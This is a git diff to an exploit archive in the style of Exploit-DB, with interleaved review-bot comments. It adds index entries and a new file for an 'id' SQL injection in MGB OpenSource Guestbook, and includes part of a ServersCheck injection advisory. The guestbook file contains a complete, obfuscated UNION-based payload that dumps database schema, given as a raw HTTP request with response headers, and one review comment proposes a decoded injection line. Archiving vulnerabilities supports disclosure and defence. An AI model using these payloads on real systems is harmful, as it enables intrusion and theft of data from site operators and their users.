+# SQL Injection - original page results successfully manipulated using 18391-2
+# Examples:
+
+http://127.0.0.1:1272/alerts.html?id=18391
+No data available in table
+
+Then using 34 minus 2,
+
+http://127.0.0.1:1272/alerts.html?id=18391-2
+153 a day ago test Status Change OK to DOWN Unable to connect to host
+
+and minus 1,
+
+http://127.0.0.1:1272/alerts.html?id=18391-1
+155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK
+154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN
+
+
+http://127.0.0.1:1272/floorplans.html?floorplan=34
+Floor Plan PLANXY
+
+Then using 34 minus 2,
+
+http://127.0.0.1:1272/floorplans.html?floorplan=34-2
+Floor Plan 0
\ No newline at end of file
diff --git a/exploits/windows/webapps/45665.txt b/exploits/windows/webapps/45665.txt
new file mode 100644
index 000000000..e3fe0845c
--- /dev/null
+++ b/exploits/windows/webapps/45665.txt
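Review bot: `# CVE: N/A` conflicts with the reference `CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt` listed two lines below it; set `# CVE: CVE-2018-18550`. The floorplans section (`floorplans.html?floorplan=34-2` returning `Floor Plan 0`) demonstrates a second injectable parameter that the title, the Security Issue paragraph and the CSV description never mention; list it as an affected component so it is not lost in indexing and retesting. The comment `Then using 34 minus 2,` above `alerts.html?id=18391-2` was copied from the floorplans example and should read `18391 minus 2`. The arithmetic probes (`18391-2`, `18391-1`) only show that the value is evaluated as an expression, while the `'OR 2=2 --` probe implies a quoted context; one sentence stating which context `id` is actually in would make the finding easier to confirm after the vendor fix.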
@@ -0,0 +1,35 @@
+# Exploit Title: MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.m-gb.org/
+# Software Link: https://sourceforge.net/projects/mopzz-gb/files/latest/download
+# Version: 0.7.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/email.php?id=[SQL]
+
+GET /[PATH]/email.php?id=admin%27++uniOn+selEct+(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%32%2c%33%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 15:50:23 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Set-Cookie: newentry=rjic8lu5atciee1fsacguocub3; path=/
+Set-Cookie: newentry=jd795jb06ni96fqhir90cahhp7; path=/
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8af0f066f..79cbdf345 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
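Review bot: No `Cookie` header is sent and `email.php` answers 200 to the injected `id`, so this reads as a pre-authentication injection — the single most important triage fact — yet the header does not say so; add `# Authentication: Not required` (or correct it if a login was in fact used). The payload `admin' uniOn selEct (…information_schema dump…),2,3-- -` is percent-encoded and mixed-case, which hides that `id` is apparently compared as a quoted string (the `admin` prefix suggests a user-name-like value) and that the query has three columns; a decoded line such as `# Decoded: id=admin' UNION SELECT VERSION(),2,3-- -` would make both explicit. The file is placed under `exploits/windows/webapps/` although the target is a PHP guestbook and only the test host was Windows (`Server: Apache/2.4.25 (Win32) … PHP/5.6.30`), which is inconsistent with the other PHP entries in this batch.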
@@ -6148,13 +6148,14 @@ id,file,description,date,author,type,platform,port
 45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
 45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android,
 45641,exploits/windows_x86/dos/45641.py,"Modbus Poll 7.2.2 - Denial of Service (PoC)",2018-10-22,"Cemal Cihad ÇİFTÇİ",dos,windows_x86,
-45644,exploits/windows/dos/45644.pl,"AudaCity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows,
+45644,exploits/windows/dos/45644.pl,"Audacity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows,
 45647,exploits/macos/dos/45647.c,"Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking",2018-10-22,"Google Security Research",dos,macos,
 45648,exploits/multiple/dos/45648.txt,"Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem",2018-10-22,"Google Security Research",dos,multiple,
 45649,exploits/ios/dos/45649.txt,"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value",2018-10-22,"Google Security Research",dos,ios,
 45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple,
 45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
 45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
+45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10046,6 +10047,7 @@ id,file,description,date,author,type,platform,port
 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
 45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
+45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40171,3 +40173,10 @@ id,file,description,date,author,type,platform,port
 45654,exploits/php/webapps/45654.txt,"eNdonesia Portal 8.7 - 'artid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
 45655,exploits/php/webapps/45655.txt,"The Open ISES Project 3.30A - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php,
 45656,exploits/php/webapps/45656.txt,"Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
+45657,exploits/php/webapps/45657.txt,"Appsource School Management System 1.0 - 'student_id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
+45659,exploits/php/webapps/45659.txt,"SIM-PKH 2.4.1 - Arbitrary File Upload",2018-10-23,"Ihsan Sencan",webapps,php,
+45661,exploits/windows/webapps/45661.txt,"ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection",2018-10-23,hyp3rlinx,webapps,windows,
+45662,exploits/php/webapps/45662.txt,"School ERP Pro+Responsive 1.0 - Arbitrary File Download",2018-10-23,"Ihsan Sencan",webapps,php,
+45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
+45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
+45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,
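Review bot: `45665` is indexed with platform `windows` and path `exploits/windows/webapps/45665.txt`, while the other PHP web applications added in this batch (`45657`, `45659`, `45662`–`45664`) are `php`; MGB OpenSource Guestbook is a PHP application that only happened to be tested on a Windows/Apache host, so a `searchsploit` filter on `php` will miss it. Platform should follow the target software, not the test OS, or the index becomes unreliable for exactly the queries it exists to answer. The `45657` description also names only `'student_id'` although that advisory covers `teacher_id` as well.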